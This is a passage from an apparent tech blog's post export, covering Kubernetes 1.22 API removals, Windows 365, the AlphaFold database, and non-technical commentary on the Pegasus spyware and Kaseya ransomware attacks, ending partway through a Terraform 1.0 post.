The least GitHub can do is address that community\u0026rsquo;s concerns with the seriousness they deserve. This conversation is far from over, and how it\u0026rsquo;s resolved will set important precedents for the intersection of AI and open source for years to come.\n","date":"12 August 2021","externalUrl":null,"permalink":"/posts/210812-github-copilot-open-source-debate/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot’s AI-powered code suggestions have sparked a fierce debate about open source licensing, training data consent, and the future of code ownership.","title":"GitHub Copilot and the Open Source Licensing Firestorm","type":"posts"},{"content":"Kubernetes 1.22 landed this week, and it\u0026rsquo;s one of the most significant releases in recent memory — not because of flashy new features, but because of what it removes. This release drops a large batch of deprecated beta APIs that have been hanging around for years, and it graduates several important features to stable. The support window improvements that began with Kubernetes 1.19 had set the stage for more aggressive API cleanup. For those of us running Kubernetes in production, this is the release that demands attention.\nThe Great API Cleanup # The headline change is the removal of several beta API versions that have long been superseded by stable equivalents. 
Specifically, Kubernetes 1.22 removes:\nIngress beta APIs (extensions/v1beta1 and networking.k8s.io/v1beta1) — replaced by networking.k8s.io/v1 (stable since 1.19) CustomResourceDefinition beta APIs (apiextensions.k8s.io/v1beta1) — replaced by apiextensions.k8s.io/v1 (stable since 1.16) ValidatingWebhookConfiguration and MutatingWebhookConfiguration beta APIs — stable equivalents available since 1.16 CertificateSigningRequest beta APIs — stable since 1.19 Several other beta resources in the rbac.authorization.k8s.io/v1beta1 group If you\u0026rsquo;re thinking \u0026ldquo;we should have migrated off those ages ago\u0026rdquo; — you\u0026rsquo;re right. These deprecations were announced one to two years ago, with the stable replacements available even longer. But I\u0026rsquo;ve seen enough production clusters to know that many teams are still running manifests with extensions/v1beta1 Ingress resources because, well, they worked and nobody prioritised the migration.\nThose teams are about to have a bad day if they upgrade without preparation. Later Kubernetes releases continued this disciplined API cleanup, maturing the platform further.\nHow to Prepare # Before upgrading to 1.22, you need to audit your cluster. The Kubernetes project has made this relatively straightforward. Modern Kubernetes operations emphasize automation over manual migrations.\nUse kubectl convert: This plugin can convert manifests between API versions. Run it against your stored YAML files to identify what needs updating.\nCheck the API deprecation guide: The official deprecation guide lists every removed API with its replacement.\nAudit with kubectl get --raw: Query the API discovery endpoints to see which API versions your workloads are actually using.\nWatch audit logs: If you\u0026rsquo;ve enabled audit logging, search for requests to deprecated API endpoints. 
This reveals which controllers, operators, and CI/CD pipelines are still using old APIs.\nTest with --warnings-as-errors: Recent kubectl versions surface deprecation warnings. Treat these as errors in your CI pipeline to catch issues before they hit production.\nThe critical thing many people miss: it\u0026rsquo;s not just your own manifests that matter. Helm charts, operators, and third-party controllers may also reference deprecated APIs. Check that your installed operators are compatible with 1.22 before upgrading. Operator maturity and standardization improved significantly as the ecosystem consolidated. The Helm mapkubeapis plugin can help update stored Helm release metadata.\nFeatures Graduating to Stable # The evolution of Kubernetes APIs toward stability is a sign of the platform\u0026rsquo;s maturation.\nBeyond the removals, 1.22 promotes several features to GA (Generally Available):\nServer-Side Apply reaches GA after a long beta. This is significant — it moves apply logic from kubectl to the API server, enabling proper field-level ownership tracking. If you\u0026rsquo;ve ever had two controllers fighting over the same resource fields, Server-Side Apply is the solution. It tracks which manager owns which fields and prevents conflicts.\nExternal Credential Providers graduate to stable, allowing kubectl to authenticate using external credential systems. This is essential for enterprise environments using custom identity providers.\nBound Service Account Token Volumes reach GA, replacing the old non-expiring service account tokens with time-bound, audience-bound tokens. 
This is a meaningful security improvement — the old tokens were essentially permanent credentials that never expired and could be used against any audience.\nPodDisruptionBudget is worth a mention here too: its policy/v1 API has been stable since 1.21, and the policy/v1beta1 version is deprecated but not yet removed.\nThe Maturity Signal # What I find most interesting about 1.22 is what it signals about Kubernetes\u0026rsquo; maturity. A project that aggressively removes deprecated APIs is a project that\u0026rsquo;s confident in its stable interfaces. The Kubernetes API deprecation policy — at least three releases of overlap for beta-to-GA transitions — gives users reasonable migration windows.\nCompare this to the early days of Kubernetes (I remember running 1.4 and 1.5 in production) when breaking changes between minor versions were common and often poorly documented. The project has come a long way in API governance.\nThis maturity also means that the \u0026ldquo;upgrade every release\u0026rdquo; cadence is becoming more important, not less. With the support window at roughly 14 months (three minor versions), and deprecated APIs being removed on schedule, falling behind means accumulating migration debt that compounds with each skipped release.\nMy Take # I\u0026rsquo;ve been running Kubernetes in production environments since before it hit 1.0, and 1.22 feels like a watershed moment. The project is choosing long-term API cleanliness over short-term convenience, and that\u0026rsquo;s the right call.\nMy advice for teams: don\u0026rsquo;t skip this upgrade, but don\u0026rsquo;t rush it either. Spend a week auditing your manifests, Helm charts, and operators against the API migration guide. Set up a staging cluster running 1.22 and deploy your full stack against it. Fix the breakages there, not in production.\nAnd if this upgrade is painful for your team, take it as a signal to invest in your upgrade processes. 
Kubernetes is easing from four releases a year to three, but the API deprecation cycle will continue. The teams that treat Kubernetes upgrades as routine maintenance rather than a recurring fire drill are the ones that sleep well at night.\nFifty-three enhancements in one release — thirteen graduating to stable, twenty-four in beta, and sixteen entering alpha. The Kubernetes train keeps moving, and 1.22 is a reminder to stay on board.\n","date":"5 August 2021","externalUrl":null,"permalink":"/posts/210805-kubernetes-1-22-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.22 drops several long-deprecated beta APIs and graduates key features to stable — a sign the project is maturing and cleaning house.","title":"Kubernetes 1.22 — Removing the Training Wheels","type":"posts"},{"content":"Microsoft just unveiled Windows 365, a service that streams a full Windows desktop from Azure to any device with a web browser. Set to launch on August 2nd, it promises a \u0026ldquo;Cloud PC\u0026rdquo; — a persistent, personalised Windows instance running in the cloud. If you\u0026rsquo;ve worked with Azure Virtual Desktop (formerly Windows Virtual Desktop), this is its consumer-friendly sibling. And as someone who\u0026rsquo;s managed developer environments across distributed teams, I think this could be more significant than it initially appears.\nWhat Windows 365 Actually Is # Let\u0026rsquo;s be precise about what Microsoft is offering. Windows 365 is a Desktop-as-a-Service (DaaS) product built on top of Azure infrastructure. Each user gets a dedicated virtual machine running Windows 10 (with Windows 11 coming later) that persists between sessions. Your files, apps, and settings stay exactly where you left them.\nThe key differentiator from existing Azure Virtual Desktop (AVD) is simplicity. AVD requires IT administrators to manage host pools, session hosts, scaling plans, and image management. 
Windows 365 abstracts all of that away — you pick a configuration (CPU, RAM, storage), assign it to a user, and they get a Cloud PC. Microsoft handles the infrastructure, patching, and availability.\nPricing tiers range from basic configurations (2 vCPU, 4GB RAM, 64GB storage) suitable for lightweight productivity work, up to more capable setups (8 vCPU, 32GB RAM, 512GB storage) that could handle development workloads. Per-user, per-month pricing — no variable compute costs to worry about.\nThe Developer Workstation Question # What interests me most is the implications for developer environments. I\u0026rsquo;ve spent years wrestling with the \u0026ldquo;works on my machine\u0026rdquo; problem, and cloud-based development environments have been slowly gaining traction. GitHub Codespaces, Gitpod, and JetBrains\u0026rsquo; upcoming remote development features all point in this direction.\nWindows 365 takes a different approach. Rather than providing a specialised development environment, it offers a full desktop. This means you could run Visual Studio (not just VS Code), local Docker instances, database tools, and anything else your workflow requires — all in the cloud.\nFor distributed teams, the advantages are compelling:\nOnboarding: New developers get a pre-configured Cloud PC instead of spending two days setting up their local machine Security: Source code never leaves the cloud. You can enforce network policies at the Azure level Hardware independence: Your developers can use any device — a thin client, a Chromebook, even a tablet — and still access a full development environment Consistency: Every team member works on an identical base configuration The latency question is the elephant in the room, of course. Azure Virtual Desktop uses the RDP protocol with optimisations like Shortpath for managed networks. For text-heavy development work (writing code, running terminal commands), the latency is manageable on decent connections. 
For GPU-intensive work or scenarios requiring precise mouse input, the experience still lags behind local hardware.\nHow This Compares to the Competition # Microsoft isn\u0026rsquo;t the first to market here. Amazon WorkSpaces has offered virtual desktops since 2014. Citrix has been doing this for even longer. And on the developer-specific side, the aforementioned Codespaces and Gitpod offer more targeted solutions.\nWhat Microsoft brings is integration depth. Windows 365 ties into Microsoft Endpoint Manager for device management, Azure Active Directory for identity, and Microsoft 365 for productivity apps. If your organisation is already in the Microsoft ecosystem — and a staggering number of enterprises are — the adoption friction is minimal.\nThe pricing will be the make-or-break factor. At the high end, a capable Cloud PC costs more per month than financing equivalent local hardware. But that calculation ignores IT management overhead, security benefits, and the flexibility to scale configurations up or down. For enterprises with compliance requirements that mandate centralised data control, the premium may be easily justified.\nInfrastructure Implications # From an infrastructure perspective, Windows 365 represents a broader trend I\u0026rsquo;ve been watching: the steady migration of traditionally local compute to cloud-managed services. We\u0026rsquo;ve already moved our servers, our CI/CD pipelines, our databases, and increasingly our development environments to the cloud. The end-user desktop was one of the last holdouts.\nThe sustainability of this model depends on network infrastructure. Microsoft is betting that broadband connectivity is now reliable enough for real-time desktop streaming. In many urban and suburban areas, that\u0026rsquo;s true. In rural areas or developing regions, it\u0026rsquo;s not — creating a potential digital divide in workplace tooling.\nThere\u0026rsquo;s also the question of offline capability. 
A Cloud PC is useless without an internet connection. Microsoft hasn\u0026rsquo;t announced any offline sync features, which limits applicability for developers who work on planes, trains, or in areas with spotty connectivity. This is a gap that local development environments don\u0026rsquo;t have.\nMy Take # I\u0026rsquo;ve been managing developer environments since before virtualisation was mainstream, and I\u0026rsquo;ve watched the pendulum swing between thin clients and fat clients multiple times. Windows 365 feels like the most credible thin-client push yet, primarily because the underlying cloud infrastructure and network connectivity have finally caught up to the vision.\nWill I be recommending it for developer teams right now? Probably not as a primary workstation — the latency overhead and offline limitations are real constraints for intensive development work. But as a secondary environment for accessing corporate resources, testing in Windows-specific configurations, or providing secure access to sensitive codebases? Absolutely.\nThe more interesting question is where this goes in two to three years. If Microsoft can get latency down to imperceptible levels and add GPU-backed configurations at reasonable prices, the case for local development hardware weakens considerably. We\u0026rsquo;re not there yet, but the trajectory is clear.\nFor now, Windows 365 is a solid v1 product that will find immediate traction in enterprise IT departments. 
For developers, keep an eye on this space — the cloud desktop isn\u0026rsquo;t just for spreadsheet jockeys anymore.\n","date":"29 July 2021","externalUrl":null,"permalink":"/posts/210729-windows-365-cloud-pc-future/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft announces Windows 365, a full Cloud PC experience — and it might reshape how we think about developer workstations and enterprise IT.","title":"Windows 365 Cloud PC — Microsoft's Bet on the Desktop-as-a-Service Future","type":"posts"},{"content":"In a week where it\u0026rsquo;s easy to be cynical about AI hype, DeepMind has given us something genuinely remarkable. They\u0026rsquo;ve released the AlphaFold Protein Structure Database in partnership with EMBL-EBI, providing predicted 3D structures for over 350,000 proteins — including nearly the entire human proteome. This isn\u0026rsquo;t a demo, a benchmark, or a press release. It\u0026rsquo;s a production-quality scientific resource, and it\u0026rsquo;s free.\nAs someone who\u0026rsquo;s spent most of my career in software rather than biology, I\u0026rsquo;m not going to pretend I fully grasp the protein folding problem\u0026rsquo;s biochemistry. But I do understand what it means when a computational approach solves a problem that experimental methods have been grinding at for 50 years, and then gives away the results.\nThe Technical Achievement # Protein structure prediction has been the holy grail of computational biology since Christian Anfinsen\u0026rsquo;s work, recognised with the 1972 Nobel Prize in Chemistry, showed that a protein\u0026rsquo;s amino acid sequence determines its shape. The problem: there are an astronomical number of possible configurations for even a small protein, and simulating the physics takes enormous computational resources.\nAlphaFold 2, which dominated the CASP14 competition last December, approaches this differently. 
Rather than simulating physics, it uses a deep learning architecture that combines:\nMultiple sequence alignments (MSAs) to capture evolutionary relationships between proteins An attention-based neural network (the \u0026ldquo;Evoformer\u0026rdquo;) that reasons about spatial and evolutionary relationships simultaneously A structure module that directly predicts 3D atomic coordinates The model achieves accuracy competitive with experimental methods like X-ray crystallography for many proteins — but in minutes rather than months or years. The median accuracy across the human proteome predictions is remarkably high, with confidence scores that let researchers know which predictions to trust.\nWhy Open Matters # What elevates this from \u0026ldquo;impressive research\u0026rdquo; to \u0026ldquo;genuinely transformative\u0026rdquo; is the decision to release everything openly. The AlphaFold source code is available on GitHub under an Apache 2.0 licence. The database is freely accessible through EMBL-EBI. DeepMind plans to expand coverage to 100 million proteins — essentially every known protein sequence.\nI\u0026rsquo;ve worked on enough proprietary systems to appreciate what this means. DeepMind could have built a commercial platform, charged for API access, or created a gated research portal. Instead, they\u0026rsquo;ve created a public good. Researchers at underfunded universities in developing countries have the same access as labs at Harvard or Oxford.\nThis is particularly noteworthy given the broader AI industry\u0026rsquo;s trend toward closed models and proprietary training data. DeepMind is showing that open release of both models and predictions can coexist with a viable business (albeit one bankrolled by Alphabet\u0026rsquo;s deep pockets).\nThe Software Engineering Angle # From a pure engineering perspective, the AlphaFold system is fascinating. 
The inference pipeline requires significant GPU resources — you\u0026rsquo;ll need at least an A100 or equivalent to run predictions locally. But the team has made thoughtful engineering choices:\nJackhmmer and HHblits for sequence alignment, leveraging established bioinformatics tools rather than reinventing the wheel JAX as the deep learning framework, which enables efficient compilation and parallelisation A well-structured codebase that separates data processing, model architecture, and inference logic For ML engineers, the architecture paper (published in Nature) is worth reading regardless of your domain. The \u0026ldquo;recycling\u0026rdquo; mechanism — where the model iteratively refines its predictions by feeding outputs back as inputs — is an elegant approach that\u0026rsquo;s applicable beyond protein folding.\nThe database infrastructure itself is built on standard bioinformatics tools and formats (mmCIF files, PDB format), which means it slots directly into existing scientific workflows. Good engineering isn\u0026rsquo;t just about the model — it\u0026rsquo;s about making the outputs actually usable.\nWhat This Means for AI\u0026rsquo;s Credibility # I\u0026rsquo;ll be honest: I\u0026rsquo;ve grown weary of AI announcements that amount to \u0026ldquo;we beat a benchmark\u0026rdquo; or \u0026ldquo;our chatbot sounds slightly more human.\u0026rdquo; The gap between AI research results and real-world impact has been a persistent frustration.\nAlphaFold is different. Structural biologists are already using these predictions to guide experiments, understand disease mechanisms, and design potential drug candidates. The database had thousands of accesses within hours of launch. 
This is AI solving a real problem that matters to people beyond the machine learning community.\nIt also demonstrates something important about where deep learning actually excels: problems with vast amounts of structured training data (protein sequences and known structures), clear evaluation metrics (does the predicted structure match reality?), and well-defined inputs and outputs. These are the conditions under which current AI approaches genuinely shine.\nMy Take # In three decades of watching technology trends, I\u0026rsquo;ve learned to distinguish between demos and deployments. AlphaFold\u0026rsquo;s protein database is a deployment. It\u0026rsquo;s not perfect — some predictions have low confidence, membrane proteins remain challenging, and the model predicts static structures rather than the dynamic conformations proteins actually adopt. But it\u0026rsquo;s useful right now, for real scientists, solving real problems.\nFor those of us in the software world, there\u0026rsquo;s an inspiring lesson here about what happens when you combine genuine technical excellence with a commitment to open access. DeepMind didn\u0026rsquo;t just train a model — they built a database, wrote documentation, partnered with domain experts at EMBL-EBI, and released code that other researchers can run and improve.\nThat\u0026rsquo;s the standard I wish more AI projects would aim for. Not just impressive results on a leaderboard, but a usable resource that advances an entire field. 
This is one of those weeks where the hype is actually justified.\n","date":"22 July 2021","externalUrl":null,"permalink":"/posts/210722-alphafold-protein-database-ai-science/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepMind releases 350,000 protein structure predictions as an open database — a rare moment where AI genuinely accelerates scientific progress.","title":"AlphaFold's Protein Database — When AI Delivers on the Hype","type":"posts"},{"content":"This week, a consortium of journalists published the Pegasus Project, exposing how NSO Group\u0026rsquo;s Pegasus spyware has been deployed against journalists, activists, and political figures worldwide. The technical details emerging from Amnesty International\u0026rsquo;s forensic methodology report are staggering — and as someone who\u0026rsquo;s spent decades thinking about software security, I find the implications deeply troubling.\nWhat Makes Pegasus Different # Pegasus isn\u0026rsquo;t your average piece of malware. It leverages zero-click exploits, meaning the target doesn\u0026rsquo;t need to open a link, download a file, or take any action at all. A specially crafted iMessage, for instance, can compromise an iPhone without the recipient ever interacting with it.\nThe attack chain reportedly exploits vulnerabilities in Apple\u0026rsquo;s iMessage processing pipeline — specifically how the system handles certain file formats before they\u0026rsquo;re even rendered to the user. This is a fundamentally different threat model from traditional phishing attacks. You can\u0026rsquo;t train users to avoid something they never see.\nFrom Amnesty International\u0026rsquo;s technical forensic methodology, the spyware can extract messages, emails, photos, record calls, and silently activate microphones and cameras. 
It operates across both iOS and Android with platform-specific exploit chains.\nThe Zero-Click Problem # What keeps me up at night about zero-click exploits isn\u0026rsquo;t just Pegasus — it\u0026rsquo;s the architectural pattern they expose. Modern messaging apps perform complex parsing of rich media formats before any user interaction. This creates an enormous attack surface that exists purely by design.\nConsider the chain: a message arrives, the OS processes it, the app parses the content type, renderers decode the payload — all before a single pixel appears on screen. Each step involves complex C/C++ code processing untrusted input. For an attacker with enough resources, this is a goldmine.\nApple\u0026rsquo;s BlastDoor sandbox, introduced in iOS 14, was supposed to mitigate exactly this class of attack by isolating message parsing. The fact that Pegasus apparently found ways around it tells you something about the difficulty of securing these pipelines. You can add layers of sandboxing, but sufficiently motivated attackers with nation-state budgets will find seams.\nSupply Chain Trust in a Post-Pegasus World # The broader question for our industry is about trust in the software supply chain. NSO Group sells Pegasus exclusively to governments, ostensibly for counter-terrorism and law enforcement. But the leaked list of 50,000+ phone numbers suggests the tool is being used far beyond those narrow justifications.\nThis creates an uncomfortable dynamic for software vendors. Every vulnerability you ship isn\u0026rsquo;t just a bug — it\u0026rsquo;s potential ammunition for surveillance vendors. The market for zero-day exploits is thriving, and companies like NSO Group, Candiru, and others are willing to pay millions for reliable exploit chains.\nFor those of us building software, this reinforces something I\u0026rsquo;ve been saying for years: security isn\u0026rsquo;t a feature you bolt on. It\u0026rsquo;s an architectural property. 
Memory-safe languages, minimal attack surfaces, principle of least privilege — these aren\u0026rsquo;t academic niceties. They\u0026rsquo;re defences against adversaries with essentially unlimited budgets.\nWhat Developers Should Take Away # If you\u0026rsquo;re building applications that process untrusted input — and nearly all of us are — the Pegasus revelations should sharpen your thinking:\nReduce parser complexity: Every format you support is attack surface. Do you really need to render that obscure image format client-side?\nSandbox aggressively: Process untrusted data in isolated contexts with minimal permissions. Even if parsing is exploited, limit what an attacker can reach.\nMemory safety matters: A significant portion of zero-click exploits target memory corruption bugs. Languages like Rust eliminate entire classes of these vulnerabilities. The argument for memory-safe languages in security-critical code just got stronger.\nAssume compromise: Design systems where a single compromised component can\u0026rsquo;t exfiltrate everything. Compartmentalise data access.\nMy Take # I\u0026rsquo;ve been in this industry long enough to remember when \u0026ldquo;nation-state adversary\u0026rdquo; was considered an unrealistic threat model for most software. Pegasus demonstrates that the tools of nation-state surveillance have been productised and sold to dozens of governments worldwide. The adversary isn\u0026rsquo;t hypothetical anymore.\nWhat frustrates me most is the asymmetry. NSO Group reportedly has hundreds of engineers working on exploitation. Most development teams I\u0026rsquo;ve worked with have maybe one part-time person thinking about security. The economics are wildly skewed in the attacker\u0026rsquo;s favour.\nThe silver lining, if there is one, is that this kind of exposure tends to accelerate defensive investment. Apple will undoubtedly harden iMessage further. Google will tighten Android\u0026rsquo;s messaging stack. 
But the fundamental tension remains: we build complex systems that process untrusted input, and sophisticated attackers will always find the cracks.\nFor those of us shipping software every day, the lesson is clear — every line of parsing code you write is a potential entry point. Treat it accordingly.\n","date":"15 July 2021","externalUrl":null,"permalink":"/posts/210715-pegasus-spyware-zero-click-exploits/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Pegasus Project revelations expose industrial-grade zero-click exploits targeting journalists and activists — and raise uncomfortable questions about software supply chains.","title":"Pegasus Spyware — Zero-Click Exploits and What They Mean for Software Security","type":"posts"},{"content":"Last Friday — the Friday before the Fourth of July weekend, because attackers have impeccable timing — the REvil ransomware group launched what may be the most impactful supply chain attack we\u0026rsquo;ve seen yet. By exploiting vulnerabilities in Kaseya\u0026rsquo;s VSA remote monitoring and management platform, they managed to push ransomware to an estimated 1,500 businesses across at least 17 countries. The ransom demand? $70 million in Bitcoin for a universal decryptor.\nIf the SolarWinds attack was a precision strike aimed at high-value espionage targets, Kaseya is a carpet bombing — hitting as many victims as possible through a single point of leverage. And the leverage point they chose reveals a deeply uncomfortable truth about how managed service providers operate.\nThe Attack Vector # Kaseya VSA is a remote monitoring and management (RMM) tool used primarily by managed service providers (MSPs) — companies that handle IT infrastructure for small and medium businesses that don\u0026rsquo;t have their own IT departments. 
An MSP might manage hundreds of client organizations through a single VSA instance.\nThe attackers exploited zero-day vulnerabilities in the VSA server software — specifically, an authentication bypass and subsequent code execution chain. Because VSA is designed to push software updates and patches to managed endpoints, the ransomware was delivered through the exact mechanism that\u0026rsquo;s supposed to keep those endpoints secure. The irony is painful.\nThe attack chain was elegant in its simplicity: compromise the VSA server, use its legitimate update distribution mechanism to push the REvil ransomware payload to all managed endpoints, and watch as hundreds of businesses per MSP instance go dark simultaneously. Kaseya estimates that around 60 of their MSP customers were directly compromised, but each of those MSPs manages dozens to hundreds of downstream organizations.\nWhy MSPs Are the Perfect Target # I\u0026rsquo;ve been warning about the MSP supply chain risk for years, and this attack validates those concerns in the worst possible way.\nMSPs occupy a uniquely privileged position in the security landscape. They have administrative access to their clients\u0026rsquo; networks, the ability to deploy software across all managed endpoints, and — critically — they\u0026rsquo;re often trusted implicitly by their clients\u0026rsquo; security tools. Antivirus exclusions for the RMM agent are standard practice. Firewall rules allowing RMM traffic are standard practice. The MSP\u0026rsquo;s toolchain operates with the kind of deep, persistent access that would be a red flag in any other context.\nThis isn\u0026rsquo;t a flaw in the MSP model per se — it\u0026rsquo;s inherent to how remote management works. But it means that compromising an MSP gives an attacker the same access that the MSP has: administrative control over every client environment. 
The force multiplication is staggering.\nWhat makes this attack especially concerning is that many of the affected businesses are small operations — dental offices, accounting firms, small retailers — that don\u0026rsquo;t have the technical sophistication to even understand what happened, let alone recover from it. They hired an MSP precisely because they couldn\u0026rsquo;t manage IT themselves. Now their trust in that outsourcing model has been weaponized against them.\nThe Patch That Almost Was # Here\u0026rsquo;s a detail that makes this story even more frustrating: Kaseya was in the process of patching these vulnerabilities when the attack occurred. The Dutch Institute for Vulnerability Disclosure (DIVD) had discovered the flaws and was working with Kaseya on a responsible disclosure and remediation timeline. REvil apparently discovered the same vulnerabilities independently — or through other means — and exploited them before the patches could be deployed.\nThis highlights a tension in vulnerability disclosure that the security community has debated for decades. Responsible disclosure gives vendors time to fix issues, but that window is also a window of exposure. If multiple parties can find the same vulnerability, the assumption that attackers don\u0026rsquo;t know about it until the CVE is published is dangerously naive.\nFor VSA on-premises customers, Kaseya\u0026rsquo;s immediate guidance was to shut down VSA servers entirely until a patch was available. As I write this, those servers have been offline for nearly a week, meaning the MSPs that depend on them have been managing client infrastructure manually — or not at all — for days. 
The operational impact extends well beyond the ransomware itself.\nWhat This Means for Software Supply Chains # The Kaseya attack, combined with SolarWinds, the Codecov breach, and the various npm supply chain attacks we\u0026rsquo;ve seen, establishes a clear pattern: attackers are systematically targeting the tools and platforms that have privileged access to many downstream environments.\nThis has concrete implications for how we evaluate and deploy management tools:\nAssume your management plane is a target: Any tool with administrative access across multiple environments needs to be treated as critical infrastructure. That means aggressive patching, network segmentation, monitoring for anomalous behavior, and — where possible — zero-trust principles applied to the management plane itself.\nEvaluate MSP security posture: If you\u0026rsquo;re using an MSP, you need to understand their security practices in detail. What tools do they use? How are those tools patched? What\u0026rsquo;s their incident response plan? The uncomfortable truth is that most MSP contracts don\u0026rsquo;t include meaningful security guarantees or audit rights.\nDefense in depth for managed endpoints: Endpoints shouldn\u0026rsquo;t rely solely on the management tool chain for security. Independent endpoint detection and response (EDR), network-level monitoring that\u0026rsquo;s not controlled by the MSP, and offline backup strategies that can\u0026rsquo;t be reached through the management plane are all essential.\nSoftware bill of materials: Understanding what software is running in your environment — and what access it has — is no longer optional. The push for SBOM standards and supply chain transparency that accelerated after SolarWinds just got another powerful argument in its favor.\nMy Take # Every few months, we get another supply chain attack that\u0026rsquo;s described as a \u0026ldquo;wake-up call.\u0026rdquo; SolarWinds was a wake-up call. The Codecov breach was a wake-up call. 
At some point, we have to acknowledge that we\u0026rsquo;ve been hitting snooze.\nThe fundamental problem isn\u0026rsquo;t that Kaseya had vulnerabilities — all software has vulnerabilities. The problem is that our industry has built architectures where a single vulnerability in a single management tool can cascade to 1,500 businesses simultaneously. We\u0026rsquo;ve optimized for efficiency and convenience in ways that create catastrophic blast radiuses.\nI don\u0026rsquo;t have a clean answer for the small dental office in Sweden that just lost access to all their patient records. The technical solutions — better segmentation, independent monitoring, tested backups — are things they hired an MSP specifically to handle. The MSP model needs to evolve to address these risks, but that evolution costs money, and the MSP market is brutally competitive on price.\nWhat I do know is that every organization, regardless of size, needs to ask a simple question: \u0026ldquo;If the tool we use to manage our infrastructure is compromised, what happens?\u0026rdquo; If the answer is \u0026ldquo;everything is destroyed,\u0026rdquo; your architecture has a problem that no single vendor\u0026rsquo;s patch can fix.\nThe Fourth of July weekend is over. The cleanup is just beginning. And somewhere, the next supply chain target is running unpatched.\n","date":"8 July 2021","externalUrl":null,"permalink":"/posts/210708-kaseya-vsa-supply-chain-ransomware/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The REvil ransomware group exploited Kaseya’s VSA platform to hit over 1,500 businesses simultaneously. This is what supply chain attacks look like at scale.","title":"Kaseya VSA Attack — Supply Chain Ransomware Goes Nuclear","type":"posts"},{"content":"HashiCorp officially released Terraform 1.0 a few weeks ago, and it\u0026rsquo;s worth taking a moment to appreciate what this milestone represents. 
After seven years of development and a long sequence of 0.x releases that sometimes introduced breaking changes, the tool that defined infrastructure as code for an entire generation of engineers is finally declaring itself stable. This stability commitment would later become contentious when licensing changes occurred.\nIf you\u0026rsquo;ve been managing infrastructure for any significant period, you know how unusual this is. Terraform has been production-ready for years — I\u0026rsquo;ve been using it in production since 0.6 — but the 1.0 designation carries a specific promise: backward compatibility and a stable foundation to build on.\nWhat 1.0 Actually Means # Let\u0026rsquo;s be precise about what Terraform 1.0 promises and what it doesn\u0026rsquo;t. The compatibility guarantee covers:\nState file format stability: Terraform 1.x will be able to read state files created by any other 1.x version. If you\u0026rsquo;ve ever dealt with the pain of state file migrations between 0.x versions, this alone is worth celebrating. I\u0026rsquo;ve lost entire weekends to state file format changes that required careful surgery to resolve.\nConfiguration language stability: The HCL-based configuration syntax won\u0026rsquo;t have breaking changes. Your existing .tf files will continue to work across 1.x releases. New features may be added, but nothing will be removed or changed in a way that breaks existing configurations.\nCLI workflow stability: The core commands — init, plan, apply, destroy — maintain their behavior and flag interfaces. Automation scripts that wrap Terraform won\u0026rsquo;t need rewrites.\nWhat 1.0 does not promise is provider stability. Providers — the plugins that interface with AWS, Azure, GCP, and hundreds of other services — are independently versioned and can still introduce breaking changes. This is actually the right design decision. 
Cloud providers change their APIs constantly, and tying provider stability to core Terraform stability would either slow down provider development or force premature stability guarantees.\nThe Journey to 1.0 # For those who haven\u0026rsquo;t been following the trajectory, the path to 1.0 was paved by several significant releases. This maturation process mirrors the infrastructure ecosystem\u0026rsquo;s broader evolution:\nTerraform 0.12 (2019) was the biggest transformation, introducing first-class expressions, rich type constraints, and for_each — features that eliminated most of the ugly workarounds we\u0026rsquo;d accumulated over years of HCL1. The 0.12 upgrade was painful for large codebases, but the language became dramatically more capable. This pattern of stabilization followed by disruption would repeat with OpenTofu when the licensing changed.\nTerraform 0.13 brought module dependency improvements and required provider configurations that reduced the \u0026ldquo;works on my machine\u0026rdquo; problems that plagued team environments.\nTerraform 0.14 and 0.15 were the stability releases — refining the provider installation experience, improving the plan output, and generally polishing rough edges without introducing major breaking changes.\nBy the time 1.0 arrived, most active Terraform users were already on 0.15, and the upgrade path is intentionally trivial. HashiCorp designed the 0.14 → 0.15 → 1.0 progression to be as smooth as possible, learning from the pain of the 0.11 → 0.12 migration.\nThe State of the IaC Landscape # Terraform 1.0 arrives in an infrastructure as code landscape that\u0026rsquo;s more competitive than ever, and the stability guarantee is partly a strategic move to consolidate Terraform\u0026rsquo;s position.\nPulumi has been gaining traction with its \u0026ldquo;real programming languages for infrastructure\u0026rdquo; approach. 
Using Python, TypeScript, or Go instead of HCL appeals to developers who don\u0026rsquo;t want to learn another DSL. The tradeoff is that general-purpose languages make it easier to write unmaintainable infrastructure code — loops within loops, complex conditionals, abstractions that obscure intent. HCL\u0026rsquo;s constraints are a feature, not a limitation, for infrastructure management.\nAWS CDK has a strong following in AWS-only shops. If your infrastructure is entirely on AWS, the CDK\u0026rsquo;s tight integration is compelling. But multi-cloud is an operational reality for most enterprises I work with, and CDK\u0026rsquo;s AWS-centric worldview is a significant limitation.\nCrossplane is interesting for Kubernetes-native shops, extending the Kubernetes resource model to cloud infrastructure. It\u0026rsquo;s the right approach if your team already thinks in Kubernetes terms, but it\u0026rsquo;s still maturing.\nTerraform\u0026rsquo;s advantage remains its ecosystem breadth. With over 1,700 providers and a module registry that covers most common patterns, the network effects are substantial. When you need to provision infrastructure across AWS, Azure, Cloudflare, Datadog, PagerDuty, and GitHub in a single workflow, nothing else comes close.\nPractical Implications for Teams # If you\u0026rsquo;re running Terraform in production, here\u0026rsquo;s what the 1.0 release means practically:\nUpgrade now if you haven\u0026rsquo;t: The 0.15 → 1.0 upgrade is the easiest in Terraform\u0026rsquo;s history. There are no configuration language changes, no state file migrations, and no workflow changes. Run terraform init -upgrade, validate your plans, and you\u0026rsquo;re done.\nLock your provider versions: With core Terraform stabilized, provider version management becomes your primary concern. Use the required_providers block with version constraints in every module. 
